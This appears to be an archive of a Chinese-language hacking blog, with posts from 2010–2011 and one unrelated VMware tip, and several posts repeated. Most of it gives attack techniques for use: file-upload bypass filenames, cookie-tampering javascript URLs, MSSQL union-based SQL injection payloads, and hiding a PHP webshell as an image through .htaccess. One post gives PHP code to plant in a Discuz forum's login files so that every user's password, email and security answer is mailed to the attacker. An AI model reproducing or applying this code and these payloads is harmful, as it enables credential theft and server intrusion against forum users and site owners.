php后门木马对大家来说一点都不陌生吧,但是它的种类您又知多少呢?
本文为您浅析说明一些php后门木马常用的函数
php后门木马常用的函数大致上可分为四种类型:
1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open
2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
3. 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
4. .htaccess: SetHandler, auto_prepend_file, auto_append_file
详文请查看pdf
2011年11月19日星期六
2011年3月24日星期四
Mac OS + VMWare 开机卡在白苹果页面
尝试在vmware 7.1下安装mac os 10.6.x, 试了几个版本,安装时都没问题,但是只要一重启就卡在开机白苹果页面,苹果下面的风火轮都没出现。经过反复的测试,发现只要在.vmx文件下加入这行就能完美开机了:
firmware = "efi"
2010年6月5日星期六
2010年2月3日星期三
上传漏洞
很多网站都能让用户上传文件,我们就可以尝试以下方法上传后门:
1. 直接上传木马。
2. 上传时在后缀加空格或加几点。
木马.jpg.asp
4. IIS 漏洞
木马.asp;1.jpg
5. Apache 漏洞
木马.php.jpg
1. 直接上传木马。
2. 上传时在后缀加空格或加几点。
木马.asp 这里后面有一个空格
木马.asp..
3. 双重扩展名:木马.asp..
木马.jpg.asp
4. IIS 漏洞
木马.asp;1.jpg
5. Apache 漏洞
木马.php.jpg
Cookies 显示及修改
在网址栏打上这个代码:
javascript:alert(document.cookie);
会跳出一个框框,显示当前页面所储存的cookie
在网址栏打上这个代码:
javascript:void(document.cookie="username=admin");
就能达到修改特定cookie内容的目的(因站而异)
javascript:alert(document.cookie);
会跳出一个框框,显示当前页面所储存的cookie
在网址栏打上这个代码:
javascript:void(document.cookie="username=admin");
就能达到修改特定cookie内容的目的(因站而异)
【原创】discuz密码记录+电邮
Discuz 7.1/7.2 :include\login.func.php
Discuz 7.0:logging.php
搜索这段代码:
if(!$member) {
return -1;
}
在下面加入:
$title= $tmp['username'].' : '.$tmp['password'].' : '.$tmp['email'];
$msg='Username:'.$tmp['username'].' Password:'.$tmp['password'].' Email:'.$tmp['email'].' Date:'.date(DATE_RFC822).'\r\n';
$mailto='email@email.com';//这里改为你自己的电邮
$mailfrom = 'From: '.$tmp['email'];
mail($mailto,$title,$msg,$mailfrom);
如果是要较完整的资料可以使用以下代码:
$title= $_SERVER['HTTP_HOST'];
$msg='Username:'.$tmp['username'].' Password:'.$tmp['password'].' Email:'.$tmp['email'].' Question ID:'.$questionid.' Answer:'.$answer.' Date:'.date(DATE_RFC822).'\r\n';
$mailto='email@email.com';//这里改为你自己的电邮
$mailfrom = 'From: '.$tmp['email'];
mail($mailto,$title,$msg,$mailfrom);
Discuz 7.0:logging.php
搜索这段代码:
if(!$member) {
return -1;
}
在下面加入:
$title= $tmp['username'].' : '.$tmp['password'].' : '.$tmp['email'];
$msg='Username:'.$tmp['username'].' Password:'.$tmp['password'].' Email:'.$tmp['email'].' Date:'.date(DATE_RFC822).'\r\n';
$mailto='email@email.com';//这里改为你自己的电邮
$mailfrom = 'From: '.$tmp['email'];
mail($mailto,$title,$msg,$mailfrom);
如果是要较完整的资料可以使用以下代码:
$title= $_SERVER['HTTP_HOST'];
$msg='Username:'.$tmp['username'].' Password:'.$tmp['password'].' Email:'.$tmp['email'].' Question ID:'.$questionid.' Answer:'.$answer.' Date:'.date(DATE_RFC822).'\r\n';
$mailto='email@email.com';//这里改为你自己的电邮
$mailfrom = 'From: '.$tmp['email'];
mail($mailto,$title,$msg,$mailfrom);
2010年1月28日星期四
MSSQL 分析表名
MSSQL下分析表名的方法:
1。先db_name()分析出数据库名
~and 1=2 union select db_name()
2。接着用以下语句分析表名(假设数据库名为dbname)
~and 1=2 union all select name from dbname..sysobjects WHERE xtype = 'U' AND name NOT IN(SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55)
1。先db_name()分析出数据库名
~and 1=2 union select db_name()
2。接着用以下语句分析表名(假设数据库名为dbname)
~and 1=2 union all select name from dbname..sysobjects WHERE xtype = 'U' AND name NOT IN(SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55)
2010年1月27日星期三
【原创】另类隐藏PHP木马的方法
运行环境:Linux + apache
将php木马后缀改成图片类后缀,然后在木马目录或其根目录创建一个.htaccess文件(或 在原有的.htaccess文件中加入)
<filesmatch "文件名">
SetHandler application/x-httpd-php
</filesmatch>
例:1.jpg
<filesmatch "1.jpg">
SetHandler application/x-httpd-php
</filesmatch>
将php木马后缀改成图片类后缀,然后在木马目录或其根目录创建一个.htaccess文件(或 在原有的.htaccess文件中加入)
<filesmatch "文件名">
SetHandler application/x-httpd-php
</filesmatch>
例:1.jpg
<filesmatch "1.jpg">
SetHandler application/x-httpd-php
</filesmatch>
订阅:
博文 (Atom)